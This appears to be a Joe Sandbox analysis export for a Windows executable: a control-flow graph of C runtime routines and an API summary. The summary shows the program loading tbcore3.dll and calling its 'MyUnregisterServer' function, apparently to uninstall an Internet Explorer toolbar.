5254b5 _malloc 66 API calls 4231->4233 4232->4227 4234 526c62 MultiByteToWideChar 4232->4234 4233->4232 4235 526c7a 4234->4235 4236 526c99 4234->4236 4238 526c81 WideCharToMultiByte 4235->4238 4239 526c9e 4235->4239 4237 525446 __freea 66 API calls 4236->4237 4237->4227 4238->4236 4240 526ca9 WideCharToMultiByte 4239->4240 4241 526cbd 4239->4241 4240->4236 4240->4241 4242 523730 __calloc_crt 66 API calls 4241->4242 4243 526cc5 4242->4243 4243->4236 4244 526cce WideCharToMultiByte 4243->4244 4244->4236 4245 526ce0 4244->4245 4246 5235ee ___free_lconv_mon 66 API calls 4245->4246 4246->4236 4250 526f7a 4247->4250 4251 526f93 4250->4251 4254 526d4b 4251->4254 4255 524144 _LocaleUpdate::_LocaleUpdate 76 API calls 4254->4255 4258 526d60 4255->4258 4256 526d72 4257 522c72 _raise 66 API calls 4256->4257 4259 526d77 4257->4259 4258->4256 4261 526daf 4258->4261 4260 522c0a _raise 6 API calls 4259->4260 4265 526b15 4260->4265 4263 526df4 4261->4263 4266 5269e5 4261->4266 4264 522c72 _raise 66 API calls 4263->4264 4263->4265 4264->4265 4265->4217 4267 524144 _LocaleUpdate::_LocaleUpdate 76 API calls 4266->4267 4268 5269f9 4267->4268 4272 526a06 4268->4272 4273 526acc 4268->4273 4271 525fe2 ___crtGetStringTypeA 90 API calls 4271->4272 4272->4261 4274 524144 _LocaleUpdate::_LocaleUpdate 76 API calls 4273->4274 4275 526a2e 4274->4275 4275->4271 4277 526091 LCMapStringW 4276->4277 4280 5260ac 4276->4280 4278 5260b4 GetLastError 4277->4278 4277->4280 4278->4280 4279 5262aa 4283 526b1a ___ansicp 90 API calls 4279->4283 4280->4279 4281 526106 4280->4281 4282 52611f MultiByteToWideChar 4281->4282 4306 5262a1 4281->4306 4292 52614c 4282->4292 4282->4306 4284 5262d2 4283->4284 4287 5263c6 LCMapStringA 4284->4287 4288 5262eb 4284->4288 4284->4306 4285 5210cc __invoke_watson 5 API calls 4286 523fce 4285->4286 4286->4117 4289 526322 4287->4289 4290 526b63 ___convertcp 73 API calls 4288->4290 4293 5263ed 4289->4293 4298 5235ee ___free_lconv_mon 66 API calls 4289->4298 4295 5262fd 4290->4295 4291 52619d MultiByteToWideChar 4296 5261b6 LCMapStringW 4291->4296 4297 526298 4291->4297 4294 5254b5 _malloc 66 API calls 4292->4294 4302 526165 __alloca_probe_16 4292->4302 4304 5235ee ___free_lconv_mon 66 API calls 4293->4304 4293->4306 4294->4302 4299 526307 LCMapStringA 4295->4299 4295->4306 4296->4297 4301 5261d7 4296->4301 4300 525446 __freea 66 API calls 4297->4300 4298->4293 4299->4289 4308 526329 4299->4308 4300->4306 4303 5261e0 4301->4303 4307 526209 4301->4307 4302->4291 4302->4306 4303->4297 4305 5261f2 LCMapStringW 4303->4305 4304->4306 4305->4297 4306->4285 4313 526224 __alloca_probe_16 4307->4313 4315 5254b5 _malloc 66 API calls 4307->4315 4310 5254b5 _malloc 66 API calls 4308->4310 4314 52633a __invoke_watson __alloca_probe_16 4308->4314 4309 526258 LCMapStringW 4311 526292 4309->4311 4312 526270 WideCharToMultiByte 4309->4312 4310->4314 4316 525446 __freea 66 API calls 4311->4316 4312->4311 4313->4297 4313->4309 4314->4289 4317 526378 LCMapStringA 4314->4317 4315->4313 4316->4297 4319 526394 4317->4319 4320 526398 4317->4320 4322 525446 __freea 66 API calls 4319->4322 4321 526b63 ___convertcp 73 API calls 4320->4321 4321->4319 4322->4289 3191 521104 3228 52264c 3191->3228 3193 521110 GetStartupInfoW 3195 521133 3193->3195 3229 52261b HeapCreate 3195->3229 3197 521183 3231 52248e GetModuleHandleW 3197->3231 3201 5210db _fast_error_exit 66 API calls 3202 521194 __RTC_Initialize 3201->3202 3265 521dde 3202->3265 3204 5211a2 3205 5211ae GetCommandLineW 3204->3205 3339 521411 3204->3339 3280 521d81 GetEnvironmentStringsW 3205->3280 3209 5211bd 3289 521cd3 GetModuleFileNameW 3209->3289 3212 5211d2 3295 521aa4 3212->3295 3214 521411 __amsg_exit 66 API calls 3214->3212 3216 5211e3 3308 5214d0 3216->3308 3217 521411 __amsg_exit 66 API calls 3217->3216 3219 5211ea 3220 521411 __amsg_exit 66 API calls 3219->3220 3221 5211f5 __wwincmdln 3219->3221 3220->3221 3314 521000 CoInitialize CreateMutexW 3221->3314 3223 521216 3224 521224 3223->3224 3328 521681 3223->3328 3346 5216ad 3224->3346 3227 521229 _raise 3228->3193 3230 521177 3229->3230 3230->3197 3331 5210db 3230->3331 3232 5224a2 3231->3232 3233 5224a9 3231->3233 3349 5213e1 3232->3349 3235 5224b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3233->3235 3236 522611 3233->3236 3237 5224fc TlsAlloc 3235->3237 3408 5221a8 3236->3408 3241 521189 3237->3241 3242 52254a TlsSetValue 3237->3242 3241->3201 3241->3202 3242->3241 3243 52255b 3242->3243 3353 5216cb 3243->3353 3248 52207e __encode_pointer 6 API calls 3249 52257b 3248->3249 3250 52207e __encode_pointer 6 API calls 3249->3250 3251 52258b 3250->3251 3252 52207e __encode_pointer 6 API calls 3251->3252 3253 52259b 3252->3253 3370 522924 3253->3370 3260 5220f9 __decode_pointer 6 API calls 3261 5225ef 3260->3261 3261->3236 3262 5225f6 3261->3262 3390 5221e5 3262->3390 3264 5225fe GetCurrentThreadId 3264->3241 3735 52264c 3265->3735 3267 521dea GetStartupInfoA 3268 523730 __calloc_crt 66 API calls 3267->3268 3271 521e0b 3268->3271 3269 522029 _raise 3269->3204 3270 521fa6 GetStdHandle 3272 521f70 3270->3272 3271->3269 3271->3272 3273 523730 __calloc_crt 66 API calls 3271->3273 3279 521ef3 3271->3279 3272->3269 3272->3270 3274 52200b SetHandleCount 3272->3274 3275 521fb8 GetFileType 3272->3275 3277 52317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3272->3277 3273->3271 3274->3269 3275->3272 3276 521f1c GetFileType 3276->3279 3277->3272 3278 52317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3278->3279 3279->3269 3279->3272 3279->3276 3279->3278 3281 521d92 3280->3281 3282 521d96 3280->3282 3281->3209 3284 5236eb __malloc_crt 66 API calls 3282->3284 3285 521db7 3284->3285 3286 521dbe FreeEnvironmentStringsW 3285->3286 3736 5237f0 3285->3736 3286->3209 3291 521d08 _wparse_cmdline 3289->3291 3290 5211c7 3290->3212 3290->3214 3291->3290 3292 521d45 3291->3292 3293 5236eb __malloc_crt 66 API calls 3292->3293 3294 521d4b _wparse_cmdline 3293->3294 3294->3290 3296 521abc _wcslen 3295->3296 3300 5211d8 3295->3300 3297 523730 __calloc_crt 66 API calls 3296->3297 3305 521ae0 _wcslen 3297->3305 3298 521b45 3299 5235ee ___free_lconv_mon 66 API calls 3298->3299 3299->3300 3300->3216 3300->3217 3301 523730 __calloc_crt 66 API calls 3301->3305 3302 521b6b 3303 5235ee ___free_lconv_mon 66 API calls 3302->3303 3303->3300 3305->3298 3305->3300 3305->3301 3305->3302 3306 521b2a 3305->3306 3740 52367c 3305->3740 3306->3305 3307 522ae2 __invoke_watson 10 API calls 3306->3307 3307->3306 3309 5214de __IsNonwritableInCurrentImage 3308->3309 3749 522dc3 3309->3749 3311 5214fc __initterm_e 3313 52151b __IsNonwritableInCurrentImage __initterm 3311->3313 3753 522dac 3311->3753 3313->3219 3315 521035 GetCommandLineW CommandLineToArgvW 3314->3315 3316 52101f GetLastError 3314->3316 3318 521067 3315->3318 3319 521056 PathFileExistsW 3315->3319 3316->3315 3317 52102c 3316->3317 3317->3223 3321 521084 LoadLibraryW 3318->3321 3319->3318 3320 52106e PathFileExistsW 3319->3320 3320->3318 3320->3321 3322 521091 GetProcAddress 3321->3322 3323 5210aa CloseHandle CoUninitialize 3321->3323 3324 5210a3 FreeLibrary 3322->3324 3325 5210a1 3322->3325 3326 5210c2 3323->3326 3327 5210bb LocalFree 3323->3327 3324->3323 3325->3324 3326->3223 3327->3326 3854 521555 3328->3854 3330 521692 3330->3224 3332 5210e9 3331->3332 3333 5210ee 3331->3333 3334 5218c4 __FF_MSGBANNER 66 API calls 3332->3334 3335 521719 __NMSG_WRITE 66 API calls 3333->3335 3334->3333 3336 5210f6 3335->3336 3337 521465 _malloc 3 API calls 3336->3337 3338 521100 3337->3338 3338->3197 3340 5218c4 __FF_MSGBANNER 66 API calls 3339->3340 3341 52141b 3340->3341 3342 521719 __NMSG_WRITE 66 API calls 3341->3342 3343 521423 3342->3343 3344 5220f9 __decode_pointer 6 API calls 3343->3344 3345 5211ad 3344->3345 3345->3205 3347 521555 _doexit 66 API calls 3346->3347 3348 5216b8 3347->3348 3348->3227 3350 5213ec Sleep GetModuleHandleW 3349->3350 3351 52140a 3350->3351 3352 52140e 3350->3352 3351->3350 3351->3352 3352->3233 3419 5220f0 3353->3419 3355 5216d3 __init_pointers __initp_misc_winsig 3422 522913 3355->3422 3358 52207e __encode_pointer 6 API calls 3359 52170f 3358->3359 3360 52207e TlsGetValue 3359->3360 3361 522096 3360->3361 3362 5220b7 GetModuleHandleW 3360->3362 3361->3362 3365 5220a0 TlsGetValue 3361->3365 3363 5220d2 GetProcAddress 3362->3363 3364 5220c7 3362->3364 3367 5220af 3363->3367 3366 5213e1 __crt_waiting_on_module_handle 2 API calls 3364->3366 3369 5220ab 3365->3369 3368 5220cd 3366->3368 3367->3248 3368->3363 3368->3367 3369->3362 3369->3367 3371 52292f 3370->3371 3373 5225a8 3371->3373 3425 52317c 3371->3425 3373->3236 3374 5220f9 TlsGetValue 3373->3374 3375 522132 GetModuleHandleW 3374->3375 3376 522111 3374->3376 3377 522142 3375->3377 3378 52214d GetProcAddress 3375->3378 3376->3375 3379 52211b TlsGetValue 3376->3379 3380 5213e1 __crt_waiting_on_module_handle 2 API calls 3377->3380 3383 52212a 3378->3383 3381 522126 3379->3381 3382 522148 3380->3382 3381->3375 3381->3383 3382->3378 3382->3383 3383->3236 3384 523730 3383->3384 3386 523739 3384->3386 3387 5225d5 3386->3387 3388 523757 Sleep 3386->3388 3430 52557f 3386->3430 3387->3236 3387->3260 3389 52376c 3388->3389 3389->3386 3389->3387 3714 52264c 3390->3714 3392 5221f1 GetModuleHandleW 3393 522201 3392->3393 3394 522207 3392->3394 3395 5213e1 __crt_waiting_on_module_handle 2 API calls 3393->3395 3396 522243 3394->3396 3397 52221f GetProcAddress GetProcAddress 3394->3397 3395->3394 3398 522aa0 __lock 62 API calls 3396->3398 3397->3396 3399 522262 InterlockedIncrement 3398->3399 3715 5222ba 3399->3715 3402 522aa0 __lock 62 API calls 3403 522283 3402->3403 3718 523c9e InterlockedIncrement 3403->3718 3405 5222a1 3730 5222c3 3405->3730 3407 5222ae _raise 3407->3264 3409 5221b2 3408->3409 3410 5221be 3408->3410 3411 5220f9 __decode_pointer 6 API calls 3409->3411 3412 5221d2 TlsFree 3410->3412 3413 5221e0 3410->3413 3411->3410 3412->3413 3414 52298b DeleteCriticalSection 3413->3414 3415 5229a3 3413->3415 3416 5235ee ___free_lconv_mon 66 API calls 3414->3416 3417 5229b5 DeleteCriticalSection 3415->3417 3418 5229c3 3415->3418 3416->3413 3417->3415 3418->3241 3420 52207e __encode_pointer 6 API calls 3419->3420 3421 5220f7 3420->3421 3421->3355 3423 52207e __encode_pointer 6 API calls 3422->3423 3424 521705 3423->3424 3424->3358 3429 52264c 3425->3429 3427 523188 InitializeCriticalSectionAndSpinCount 3428 5231cc _raise 3427->3428 3428->3371 3429->3427 3431 52558b _raise 3430->3431 3432 5255a3 3431->3432 3440 5255c2 __invoke_watson 3431->3440 3443 522c72 3432->3443 3436 525634 HeapAlloc 3436->3440 3437 5255b8 _raise 3437->3386 3440->3436 3440->3437 3449 522aa0 3440->3449 3456 524dc3 3440->3456 3462 52567b 3440->3462 3465 5231eb 3440->3465 3468 5222cc GetLastError 3443->3468 3445 522c77 3446 522c0a 3445->3446 3447 5220f9 __decode_pointer 6 API calls 3446->3447 3448 522c1a __invoke_watson 3447->3448 3450 522ab5 3449->3450 3451 522ac8 EnterCriticalSection 3449->3451 3510 5229dd 3450->3510 3451->3440 3453 522abb 3453->3451 3454 521411 __amsg_exit 65 API calls 3453->3454 3455 522ac7 3454->3455 3455->3451 3459 524df1 3456->3459 3457 524e8a 3461 524e93 3457->3461 3709 5249da 3457->3709 3459->3457 3459->3461 3702 52492a 3459->3702 3461->3440 3713 5229c6 LeaveCriticalSection 3462->3713 3464 525682 3464->3440 3466 5220f9 __decode_pointer 6 API calls 3465->3466 3467 5231fb 3466->3467 3467->3440 3482 522174 TlsGetValue 3468->3482 3471 522339 SetLastError 3471->3445 3472 523730 __calloc_crt 63 API calls 3473 5222f7 3472->3473 3473->3471 3474 5220f9 __decode_pointer 6 API calls 3473->3474 3475 522311 3474->3475 3476 522330 3475->3476 3477 522318 3475->3477 3487 5235ee 3476->3487 3478 5221e5 __getptd_noexit 63 API calls 3477->3478 3480 522320 GetCurrentThreadId 3478->3480 3480->3471 3481 522336 3481->3471 3483 5221a4 3482->3483 3484 522189 3482->3484 3483->3471 3483->3472 3485 5220f9 __decode_pointer 6 API calls 3484->3485 3486 522194 TlsSetValue 3485->3486 3486->3483 3488 5235fa _raise 3487->3488 3489 523673 _raise _realloc 3488->3489 3491 522aa0 __lock 64 API calls 3488->3491 3499 523639 3488->3499 3489->3481 3490 52364e HeapFree 3490->3489 3492 523660 3490->3492 3495 523611 ___sbh_find_block 3491->3495 3493 522c72 _raise 64 API calls 3492->3493 3494 523665 GetLastError 3493->3494 3494->3489 3496 52362b 3495->3496 3500 524614 3495->3500 3506 523644 3496->3506 3499->3489 3499->3490 3501 5248f5 ___sbh_free_block 3500->3501 3502 524653 3500->3502 3501->3496 3502->3501 3503 52483f VirtualFree 3502->3503 3504 5248a3 3503->3504 3504->3501 3505 5248b2 VirtualFree HeapFree 3504->3505 3505->3501 3509 5229c6 LeaveCriticalSection 3506->3509 3508 52364b 3508->3499 3509->3508 3511 5229e9 _raise 3510->3511 3512 522a0f 3511->3512 3536 5218c4 3511->3536 3520 522a1f _raise 3512->3520 3582 5236eb 3512->3582 3518 522a40 3523 522aa0 __lock 66 API calls 3518->3523 3519 522a31 3522 522c72 _raise 66 API calls 3519->3522 3520->3453 3522->3520 3525 522a47 3523->3525 3526 522a7b 3525->3526 3527 522a4f 3525->3527 3528 5235ee ___free_lconv_mon 66 API calls 3526->3528 3529 52317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3527->3529 3530 522a6c 3528->3530 3531 522a5a 3529->3531 3587 522a97 3530->3587 3531->3530 3533 5235ee ___free_lconv_mon 66 API calls 3531->3533 3534 522a66 3533->3534 3535 522c72 _raise 66 API calls 3534->3535 3535->3530 3590 5235a3 3536->3590 3539 5218d8 3541 521719 __NMSG_WRITE 66 API calls 3539->3541 3543 5218fa 3539->3543 3540 5235a3 __set_error_mode 66 API calls 3540->3539 3542 5218f0 3541->3542 3544 521719 __NMSG_WRITE 66 API calls 3542->3544 3545 521719 3543->3545 3544->3543 3546 52172d 3545->3546 3547 5235a3 __set_error_mode 63 API calls 3546->3547 3578 521888 3546->3578 3548 52174f 3547->3548 3549 52188d GetStdHandle 3548->3549 3551 5235a3 __set_error_mode 63 API calls 3548->3551 3550 52189b _strlen 3549->3550 3549->3578 3553 5218b4 WriteFile 3550->3553 3550->3578 3552 521760 3551->3552 3552->3549 3554 521772 3552->3554 3553->3578 3554->3578 3596 52353b 3554->3596 3557 5217a8 GetModuleFileNameA 3558 5217c6 3557->3558 3564 5217e9 _strlen 3557->3564 3561 52353b _strcpy_s 63 API calls 3558->3561 3562 5217d6 3561->3562 3562->3564 3565 522ae2 __invoke_watson 10 API calls 3562->3565 3563 52182c 3621 52337c 3563->3621 3564->3563 3612 5233f0 3564->3612 3565->3564 3569 521850 3572 52337c _strcat_s 63 API calls 3569->3572 3571 522ae2 __invoke_watson 10 API calls 3571->3569 3574 521864 3572->3574 3573 522ae2 __invoke_watson 10 API calls 3573->3563 3575 521875 3574->3575 3577 522ae2 __invoke_watson 10 API calls 3574->3577 3630 523213 3575->3630 3577->3575 3579 521465 3578->3579 3668 52143a GetModuleHandleW 3579->3668 3584 5236f4 3582->3584 3585 522a2a 3584->3585 3586 52370b Sleep 3584->3586 3672 5254b5 3584->3672 3585->3518 3585->3519 3586->3584 3701 5229c6 LeaveCriticalSection 3587->3701 3589 522a9e 3589->3520 3591 5235b2 3590->3591 3592 522c72 _raise 66 API calls 3591->3592 3593 5218cb 3591->3593 3594 5235d5 3592->3594 3593->3539 3593->3540 3595 522c0a _raise 6 API calls 3594->3595 3595->3593 3597 523553 3596->3597 3598 52354c 3596->3598 3599 522c72 _raise 66 API calls 3597->3599 3598->3597 3603 523579 3598->3603 3600 523558 3599->3600 3601 522c0a _raise 6 API calls 3600->3601 3602 521794 3601->3602 3602->3557 3605 522ae2 3602->3605 3603->3602 3604 522c72 _raise 66 API calls 3603->3604 3604->3600 3657 525320 3605->3657 3607 522b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3608 522beb GetCurrentProcess TerminateProcess 3607->3608 3609 522bdf __invoke_watson 3607->3609 3659 5210cc 3608->3659 3609->3608 3611 5217a5 3611->3557 3615 523402 3612->3615 3613 523406 3614 522c72 _raise 66 API calls 3613->3614 3616 521819 3613->3616 3620 523422 3614->3620 3615->3613 3615->3616 3618 52344c 3615->3618 3616->3563 3616->3573 3617 522c0a _raise 6 API calls 3617->3616 3618->3616 3619 522c72 _raise 66 API calls 3618->3619 3619->3620 3620->3617 3622 523394 3621->3622 3624 52338d 3621->3624 3623 522c72 _raise 66 API calls 3622->3623 3629 523399 3623->3629 3624->3622 3627 5233c8 3624->3627 3625 522c0a _raise 6 API calls 3626 52183f 3625->3626 3626->3569 3626->3571 3627->3626 3628 522c72 _raise 66 API calls 3627->3628 3628->3629 3629->3625 3631 5220f0 _raise 6 API calls 3630->3631 3632 523223 3631->3632 3633 523236 LoadLibraryA 3632->3633 3637 5232be 3632->3637 3634 523360 3633->3634 3635 52324b GetProcAddress 3633->3635 3634->3578 3635->3634 3638 523261 3635->3638 3636 5232e8 3641 5220f9 __decode_pointer 6 API calls 3636->3641 3656 523313 3636->3656 3637->3636 3642 5220f9 __decode_pointer 6 API calls 3637->3642 3639 52207e __encode_pointer 6 API calls 3638->3639 3643 523267 GetProcAddress 3639->3643 3640 5220f9 __decode_pointer 6 API calls 3640->3634 3650 52332b 3641->3650 3644 5232db 3642->3644 3646 52207e __encode_pointer 6 API calls 3643->3646 3645 5220f9 __decode_pointer 6 API calls 3644->3645 3645->3636 3647 52327c GetProcAddress 3646->3647 3648 52207e __encode_pointer 6 API calls 3647->3648 3649 523291 GetProcAddress 3648->3649 3651 52207e __encode_pointer 6 API calls 3649->3651 3652 5220f9 __decode_pointer 6 API calls 3650->3652 3650->3656 3653 5232a6 3651->3653 3652->3656 3653->3637 3654 5232b0 GetProcAddress 3653->3654 3655 52207e __encode_pointer 6 API calls 3654->3655 3655->3637 3656->3640 3658 52532c __VEC_memzero 3657->3658 3658->3607 3660 5210d6 IsDebuggerPresent 3659->3660 3661 5210d4 3659->3661 3667 5228d2 3660->3667 3661->3611 3664 521358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3665 521375 __invoke_watson 3664->3665 3666 52137d GetCurrentProcess TerminateProcess 3664->3666 3665->3666 3666->3611 3667->3664 3669 521463 ExitProcess 3668->3669 3670 52144e GetProcAddress 3668->3670 3670->3669 3671 52145e 3670->3671 3671->3669 3673 525568 3672->3673 3682 5254c7 3672->3682 3674 5231eb _malloc 6 API calls 3673->3674 3675 52556e 3674->3675 3677 522c72 _raise 65 API calls 3675->3677 3676 5218c4 __FF_MSGBANNER 65 API calls 3676->3682 3688 525560 3677->3688 3679 521719 __NMSG_WRITE 65 API calls 3679->3682 3680 525524 HeapAlloc 3680->3682 3681 521465 _malloc 3 API calls 3681->3682 3682->3676 3682->3679 3682->3680 3682->3681 3683 525554 3682->3683 3684 5231eb _malloc 6 API calls 3682->3684 3686 525559 3682->3686 3682->3688 3689 525466 3682->3689 3685 522c72 _raise 65 API calls 3683->3685 3684->3682 3685->3686 3687 522c72 _raise 65 API calls 3686->3687 3687->3688 3688->3584 3690 525472 _raise 3689->3690 3691 5254a3 _raise 3690->3691 3692 522aa0 __lock 66 API calls 3690->3692 3691->3682 3693 525488 3692->3693 3694 524dc3 ___sbh_alloc_block 5 API calls 3693->3694 3695 525493 3694->3695 3697 5254ac 3695->3697 3700 5229c6 LeaveCriticalSection 3697->3700 3699 5254b3 3699->3691 3700->3699 3701->3589 3703 524971 HeapAlloc 3702->3703 3704 52493d HeapReAlloc 3702->3704 3705 524994 VirtualAlloc 3703->3705 3707 52495b 3703->3707 3706 52495f 3704->3706 3704->3707 3705->3707 3708 5249ae HeapFree 3705->3708 3706->3703 3707->3457 3708->3707 3710 5249f1 VirtualAlloc 3709->3710 3712 524a38 3710->3712 3712->3461 3713->3464 3714->3392 3733 5229c6 LeaveCriticalSection 3715->3733 3717 52227c 3717->3402 3719 523cbf 3718->3719 3720 523cbc InterlockedIncrement 3718->3720 3721 523cc9 InterlockedIncrement 3719->3721 3722 523ccc 3719->3722 3720->3719 3721->3722 3723 523cd6 InterlockedIncrement 3722->3723 3724 523cd9 3722->3724 3723->3724 3725 523ce3 InterlockedIncrement 3724->3725 3727 523ce6 3724->3727 3725->3727 3726 523cff InterlockedIncrement 3726->3727 3727->3726 3728 523d0f InterlockedIncrement 3727->3728 3729 523d1a InterlockedIncrement 3727->3729 3728->3727 3729->3405 3734 5229c6 LeaveCriticalSection 3730->3734 3732 5222ca 3732->3407 3733->3717 3734->3732 3735->3267 3737 523808 3736->3737 3738 52382f __VEC_memcpy 3737->3738 3739 521dd3 3737->3739 3738->3739 3739->3286 3741 523694 3740->3741 3742 52368d 3740->3742 3743 522c72 _raise 66 API calls 3741->3743 3742->3741 3747 5236c0 3742->3747 3744 523699 3743->3744 3745 522c0a _raise 6 API calls 3744->3745 3746 5236a8 3745->3746 3746->3305 3747->3746 3748 522c72 _raise 66 API calls 3747->3748 3748->3744 3751 522dc9 3749->3751 3750 52207e __encode_pointer 6 API calls 3750->3751 3751->3750 3752 522de1 3751->3752 3752->3311 3756 522d70 3753->3756 3755 522db9 3755->3313 3757 522d7c _raise 3756->3757 3764 52147d 3757->3764 3763 522d9d _raise 3763->3755 3765 522aa0 __lock 66 API calls 3764->3765 3766 521484 3765->3766 3767 522c85 3766->3767 3768 5220f9 __decode_pointer 6 API calls 3767->3768 3769 522c99 3768->3769 3770 5220f9 __decode_pointer 6 API calls 3769->3770 3771 522ca9 3770->3771 3772 522d2c 3771->3772 3787 52539a 3771->3787 3784 522da6 3772->3784 3774 52207e __encode_pointer 6 API calls 3775 522d21 3774->3775 3778 52207e __encode_pointer 6 API calls 3775->3778 3776 522cc7 3777 522ceb 3776->3777 3783 522d13 3776->3783 3800 52377c 3776->3800 3777->3772 3780 52377c __realloc_crt 73 API calls 3777->3780 3781 522d01 3777->3781 3778->3772 3780->3781 3781->3772 3782 52207e __encode_pointer 6 API calls 3781->3782 3782->3783 3783->3774 3850 521486 3784->3850 3788 5253a6 _raise 3787->3788 3789 5253d3 3788->3789 3790 5253b6 3788->3790 3791 525414 HeapSize 3789->3791 3794 522aa0 __lock 66 API calls 3789->3794 3792 522c72 _raise 66 API calls 3790->3792 3796 5253cb _raise 3791->3796 3793 5253bb 3792->3793 3795 522c0a _raise 6 API calls 3793->3795 3797 5253e3 ___sbh_find_block 3794->3797 3795->3796 3796->3776 3805 525434 3797->3805 3803 523785 3800->3803 3802 5237c4 3802->3777 3803->3802 3804 5237a5 Sleep 3803->3804 3809 52569d 3803->3809 3804->3803 3808 5229c6 LeaveCriticalSection 3805->3808 3807 52540f 3807->3791 3807->3796 3808->3807 3810 5256a9 _raise 3809->3810 3811 5256b0 3810->3811 3812 5256be 3810->3812 3815 5254b5 _malloc 66 API calls 3811->3815 3813 5256d1 3812->3813 3814 5256c5 3812->3814 3821 525843 3813->3821 3844 5256de ___sbh_resize_block ___sbh_find_block 3813->3844 3816 5235ee ___free_lconv_mon 66 API calls 3814->3816 3831 5256b8 _raise _realloc 3815->3831 3816->3831 3817 525876 3819 5231eb _malloc 6 API calls 3817->3819 3818 525848 HeapReAlloc 3818->3821 3818->3831 3822 52587c 3819->3822 3820 522aa0 __lock 66 API calls 3820->3844 3821->3817 3821->3818 3823 52589a 3821->3823 3825 5231eb _malloc 6 API calls 3821->3825 3827 525890 3821->3827 3824 522c72 _raise 66 API calls 3822->3824 3826 522c72 _raise 66 API calls 3823->3826 3823->3831 3824->3831 3825->3821 3828 5258a3 GetLastError 3826->3828 3830 522c72 _raise 66 API calls 3827->3830 3828->3831 3832 525811 3830->3832 3831->3803 3832->3831 3834 525816 GetLastError 3832->3834 3833 525769 HeapAlloc 3833->3844 3834->3831 3835 5257be HeapReAlloc 3835->3844 3836 524dc3 ___sbh_alloc_block 5 API calls 3836->3844 3837 525829 3837->3831 3839 522c72 _raise 66 API calls 3837->3839 3838 5231eb _malloc 6 API calls 3838->3844 3842 525836 3839->3842 3840 52580c 3843 522c72 _raise 66 API calls 3840->3843 3841 5237f0 __VEC_memcpy _realloc 3841->3844 3842->3828 3842->3831 3843->3832 3844->3817 3844->3820 3844->3831 3844->3833 3844->3835 3844->3836 3844->3837 3844->3838 3844->3840 3844->3841 3845 524614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3844->3845 3846 5257e1 3844->3846 3845->3844 3849 5229c6 LeaveCriticalSection 3846->3849 3848 5257e8 3848->3844 3849->3848 3853 5229c6 LeaveCriticalSection 3850->3853 3852 52148d 3852->3763 3853->3852 3855 521561 _raise 3854->3855 3856 522aa0 __lock 66 API calls 3855->3856 3857 521568 3856->3857 3858 521631 __initterm 3857->3858 3860 521594 3857->3860 3873 52166c 3858->3873 3862 5220f9 __decode_pointer 6 API calls 3860->3862 3864 52159f 3862->3864 3863 521669 _raise 3863->3330 3866 521621 __initterm 3864->3866 3868 5220f9 __decode_pointer 6 API calls 3864->3868 3866->3858 3867 521660 3869 521465 _malloc 3 API calls 3867->3869 3872 5215b4 3868->3872 3869->3863 3870 5220f9 6 API calls __decode_pointer 3870->3872 3871 5220f0 6 API calls _raise 3871->3872 3872->3866 3872->3870 3872->3871 3874 521672 3873->3874 3875 52164d 3873->3875 3878 5229c6 LeaveCriticalSection 3874->3878 3875->3863 3877 5229c6 LeaveCriticalSection 3875->3877 3877->3867 3878->3875 4323 5267c8 RtlUnwind 4426 52122e 4429 5218fe 4426->4429 4430 5222cc __getptd_noexit 66 API calls 4429->4430 4431 52123f 4430->4431 4390 52458d 4393 5229c6 LeaveCriticalSection 4390->4393 4392 524594 4393->4392

                                                    Control-flow Graph

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00521006
                                                    • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00521013
                                                    • GetLastError.KERNEL32 ref: 0052101F
                                                    • GetCommandLineW.KERNEL32(?), ref: 00521040
                                                    • CommandLineToArgvW.SHELL32(00000000), ref: 00521047
                                                    • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00521061
                                                    • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00521073
                                                    • LoadLibraryW.KERNELBASE(?), ref: 00521085
                                                    • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00521097
                                                    • FreeLibrary.KERNELBASE(00000000), ref: 005210A4
                                                    • CloseHandle.KERNELBASE(00000000), ref: 005210AB
                                                    • CoUninitialize.COMBASE ref: 005210B1
                                                    • LocalFree.KERNEL32(00000000), ref: 005210BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                    • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                    • API String ID: 474438367-4110843154
                                                    • Opcode ID: 326963372ed93872c45df544f5ade9ba55fc37e612079f5cc793b74344096cf8
                                                    • Instruction ID: 942c908e7fb72191b3f3ffe1d038cce1cee15c6192342eb59beb1abc1a978bd2
                                                    • Opcode Fuzzy Hash: 326963372ed93872c45df544f5ade9ba55fc37e612079f5cc793b74344096cf8
                                                    • Instruction Fuzzy Hash: AB11D232506A75EB83309BA0BC0CA6F3E98BE77751B000915F542D21D0DF20984AE7B9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 16 521465-521476 call 52143a ExitProcess
                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 0052146D
                                                      • Part of subcall function 0052143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00521472,?,?,005254EE,000000FF,0000001E,?,005236FC,?,00000001,?,?,00522A2A,00000018), ref: 00521444
